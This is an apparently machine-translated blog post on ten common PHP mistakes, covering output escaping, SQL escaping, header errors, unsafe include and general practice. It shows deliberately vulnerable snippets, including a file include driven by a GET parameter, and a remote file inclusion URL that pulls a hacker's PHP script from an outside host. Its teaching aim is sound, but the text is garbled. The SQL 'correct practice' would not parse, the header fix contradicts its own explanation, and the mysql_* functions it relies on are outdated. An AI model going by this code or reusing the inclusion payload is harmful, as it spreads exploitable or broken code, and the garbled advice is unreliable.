PHP is a great web development language and a flexible language, but I see some mistakes made by PHP programmers over and over again. I have made the following list, which lists 10 mistakes that PHP programmers often make, most of which are related to security. Look at how many crimes you committed
1. Do not change the meaning of html entities
A basic common sense: all untrusted inputs (especially the data submitted by users from the form) should be changed before output.
echo $_GET['usename'] ;
This example may output:
This is an obvious security risk, unless you ensure that your users input correctly.
How to fix:
We need to convert "<", ">", "and", etc. into correct HTML representations (<,>', and "). The functions htmlspecialchars and htmlentities() do just that.
Correct method:
echo htmlspecialchars($_GET['username'], ENT_QUOTES);
2. Do not change SQL input
I once discussed this problem in an article about the simplest method to prevent sql injection (php+mysql) and gave a simple method. Someone told me that they have set magic_quotes to On in php.ini, so don't worry about this problem, but not all inputs are from $_GET, $_POST or $_COOKIE!
How to fix:
The mysql_real_escape_string() function is the same as the simplest method to prevent sql injection (php+mysql)
Correct practice:
$sql = “UPDATE users SET
name=’.mysql_real_escape_string($name).’
WHERE id=’.mysql_real_escape_string ($id).’”;
mysql_query($sql);
?>
3. Incorrect use of HTTP header related functions: header(), session_start(), setcookie ()
Have you ever met this warning? " warning: Cannot add header information – headers already sent [....]
Every time from The server When downloading a web page, the output of the server is divided into two parts: the header and the body.
The header contains some invisible data, such as cookies. The head always arrives first. The body part includes visual html, pictures and other data.
If output_buffering is set to Off, all HTTP header related functions must be called before output. The problem is that when you develop in one environment and deploy to another, the settings of output_buffering may be different. As a result, the steering stopped. Cookies and sessions were not set correctly.
How to fix:
Make sure to call http header related functions before output, and make output_buffering=Off
。
4. Files that require or include use unsafe data
Again: Don't trust data that you didn't explicitly state yourself. Do not include or require files obtained from $_GET, $_POST or $_COOKIE.
For example:
index.php
//including header, config, database connection, etc
include($_GET['filename']);
//including footer
?>
Now any hacker can use: http://www.yourdomain.com/index.php?filename=anyfile.txt
To get your confidential information, or execute a PHP script.
If allow_url_fopen=On, you are dead:
Try this input:
http://www.yourdomain.com/index.php?filename=http%3A%2F%2Fdomain.com%2Fphphack.php
Your page now contains http://www.youaredoomed.com/phphack.php Output of Hackers can send spam, change passwords, delete files, and so on. As long as you can imagine.
How to fix:
You must control which files can be included in the include or require directive.
The following is a quick but not comprehensive solution:
//Include only files that are allowed.
$allowedFiles = array(‘file1.txt’,'file2.txt’,'file3.txt’);
if(in_array((string)$_GET['filename'],$allowedFiles)) {
include($_GET['filename']);
}
else{
exit(‘not allowed’);
}
?>
5. Syntax error
Grammatical errors include all lexical and grammatical errors, which are so common that I have to list them here. The solution is to learn PHP syntax carefully, and be careful not to miss a bracket, brace, semicolon, or quotation mark. There is also a good editor, do not use notepad!
6. Little or no use of object-oriented
Many projects do not use PHP's object-oriented technology. As a result, code maintenance becomes very time-consuming and laborious. PHP supports more and more object-oriented technologies, which are getting better and better. There is no reason why we should not use object-oriented technology.
7. No framework
95% of PHP projects do the same four things: Create, edit, list, and delete There are many MVC frameworks to help us accomplish these four things. Why don't we use them?
8. I don't know the existing functions in PHP
The core of PHP contains many functions. Many programmers invent the wheel repeatedly. A lot of time was wasted. Search PHP mamual before coding, and search on Google. You may find something new! Exec() in PHP is a powerful function that can execute the cmd shell and return the last line of the execution result as a string. For security reasons, you can use EscapeShellCmd()
9. Use the old version of PHP
Many programmers are still using PHP 4. The development of PHP on PHP cannot give full play to PHP's potential, and there are still some security risks. Go to PHP 5. It doesn't take much effort. Most PHP 4 programs can be migrated to PHP 5 as long as the statements with few changes or even no changes are needed. according to http://www.nexen.net According to the survey, only 12% of PHP servers use PHP 5, so 88% of PHP developers still use PHP 4
10. Change the meaning of quotation marks twice
Have you seen 'or ' "appear on the webpage? This is usually because in the developer's environment, magic_quotes is set to off, while on the deployed server, magic_quotes=on. PHP will repeatedly run addslashes() on the data in GET, POST, and COOKIE.
Original text:
It’s a string
magic quotes on :
It\’s a string
Run again
addslashes():
It\\’s a string
HTML output:
It\’s a string
Another case is that the user input the wrong login information at the beginning. After the server detects the wrong input, it outputs the same form and requires the user to input again, causing the user's input to change its meaning twice!
